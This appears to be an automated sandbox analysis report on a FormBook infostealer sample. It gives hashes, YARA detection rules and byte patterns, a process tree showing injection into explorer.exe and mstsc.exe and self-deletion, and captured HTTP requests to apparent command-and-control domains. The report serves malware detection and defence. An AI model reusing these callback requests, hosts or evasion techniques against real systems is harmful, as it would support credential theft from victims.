Loading ...

Play interactive tourEdit tour

Analysis Report ASQ2109942.exe

Overview

General Information

Sample Name:ASQ2109942.exe
Analysis ID:299290
MD5:693849c501a595f56ca33ce5ca0ef2a2
SHA1:90b1a338a8d98b95bcb61c786c27833a79ded566
SHA256:a76869f6ece56a889175cb2cebdb60e4a24025184ebeb7fa9c6210668eb023fe
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ASQ2109942.exe (PID: 6628 cmdline: 'C:\Users\user\Desktop\ASQ2109942.exe' MD5: 693849C501A595F56CA33CE5CA0EF2A2)
    • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ASQ2109942.exe (PID: 6892 cmdline: C:\Users\user\Desktop\ASQ2109942.exe MD5: 693849C501A595F56CA33CE5CA0EF2A2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 6224 cmdline: /c del 'C:\Users\user\Desktop\ASQ2109942.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x73c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x12b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x13177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x132ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x816a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x11ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x191ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.ASQ2109942.exe.600000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.ASQ2109942.exe.600000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.ASQ2109942.exe.600000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15279:$sqlite3step: 68 34 1C 7B E1
        • 0x1538c:$sqlite3step: 68 34 1C 7B E1
        • 0x152a8:$sqlite3text: 68 38 2A 90 C5
        • 0x153cd:$sqlite3text: 68 38 2A 90 C5
        • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.ASQ2109942.exe.8a0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.ASQ2109942.exe.8a0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: ASQ2109942.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: ASQ2109942.exeJoe Sandbox ML: detected
          Source: 5.2.ASQ2109942.exe.600000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.ASQ2109942.exe.8a0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_0090F97B FindFirstFileExW,0_2_0090F97B
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_0090F97B FindFirstFileExW,5_2_0090F97B

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49775
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=OcXrvyKYC4qOC5yHOKhuHsUYXP3TwHrkwQfsx0VRdIV01sjFBCbNndHKW/o0DBl3B9Dj HTTP/1.1Host: www.wilsoncamargoycia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=jdeLL+g3OgRmWnBlBwPxY1ZAqvAtu9DUnFlhpdsDbml/l7Ikkb0zoiP+pqMvkKKdSj7r&D8P=Br-0dH HTTP/1.1Host: www.euphoricjewelzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=PmiJRqxQySb9hpfMquY4tP+aRPjIInfRRjTPr8kO1yJ4ZaEnxW7eiY5QVD1NlNhc8FOd&D8P=Br-0dH HTTP/1.1Host: www.36rn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=mP9o+B50ixDTmjMOxe5AQ0h/ik01hZ61mJYkjQK2kJ1kjDu+M59KV+tfuMuHt1B4Gov8 HTTP/1.1Host: www.studio-alfarasha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH HTTP/1.1Host: www.consultation-hippopotame.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=eGPNYRZO7eCFJQw/gPMc6MXdjTs5xQ34M+iLxqLYic8rteAXSXPpq2ETG67x2oDIutFc&D8P=Br-0dH HTTP/1.1Host: www.neurofitdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=YW7JIKUvxL6SFuLE6jZJv/RmdoycTi46qJU/qh1/IQ3QQ1C1c2NDiWYkG6rPB5jzbki3 HTTP/1.1Host: www.ruartemoyano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&D8P=Br-0dH HTTP/1.1Host: www.visacoincard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JF0BiznP5J HTTP/1.1Host: www.batttleroyaleuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.64.55 209.99.64.55
          Source: Joe Sandbox ViewIP Address: 208.91.197.39 208.91.197.39
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: C:\Windows\explorer.exeCode function: 7_2_04E09402 getaddrinfo,setsockopt,recv,7_2_04E09402
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=OcXrvyKYC4qOC5yHOKhuHsUYXP3TwHrkwQfsx0VRdIV01sjFBCbNndHKW/o0DBl3B9Dj HTTP/1.1Host: www.wilsoncamargoycia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=jdeLL+g3OgRmWnBlBwPxY1ZAqvAtu9DUnFlhpdsDbml/l7Ikkb0zoiP+pqMvkKKdSj7r&D8P=Br-0dH HTTP/1.1Host: www.euphoricjewelzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=PmiJRqxQySb9hpfMquY4tP+aRPjIInfRRjTPr8kO1yJ4ZaEnxW7eiY5QVD1NlNhc8FOd&D8P=Br-0dH HTTP/1.1Host: www.36rn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=mP9o+B50ixDTmjMOxe5AQ0h/ik01hZ61mJYkjQK2kJ1kjDu+M59KV+tfuMuHt1B4Gov8 HTTP/1.1Host: www.studio-alfarasha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH HTTP/1.1Host: www.consultation-hippopotame.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=eGPNYRZO7eCFJQw/gPMc6MXdjTs5xQ34M+iLxqLYic8rteAXSXPpq2ETG67x2oDIutFc&D8P=Br-0dH HTTP/1.1Host: www.neurofitdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=YW7JIKUvxL6SFuLE6jZJv/RmdoycTi46qJU/qh1/IQ3QQ1C1c2NDiWYkG6rPB5jzbki3 HTTP/1.1Host: www.ruartemoyano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?Cj=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&D8P=Br-0dH HTTP/1.1Host: www.visacoincard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JF0BiznP5J HTTP/1.1Host: www.batttleroyaleuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.wilsoncamargoycia.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Fri, 16 Oct 2020 13:47:55 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/7985/netsol-logos.jpg
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/7985/logo.png
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8932/arrows.jpg)
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/lst_arr.jpg)
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/frt_arr.jpg)
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/7985/headerstrip.gif)
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/srch-bg.gif)
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://survey-smiles.com
          Source: explorer.exe, 00000007.00000002.926900863.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.Visacoincard.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/All_Inclusive_Vacation_Packages.cfm?fp=%2FJNXTkkJKOkRXMQTqIh
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/Anti_Wrinkle_Creams.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rR
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/Credit_Card_Application.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/Dental_Plans.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/Healthy_Weight_Loss.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rR
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/find_a_tutor.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/music_videos.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.consultation-hippopotame.com/xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.networksolutions.com/
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.visacoincard.com/px.js?ch=1
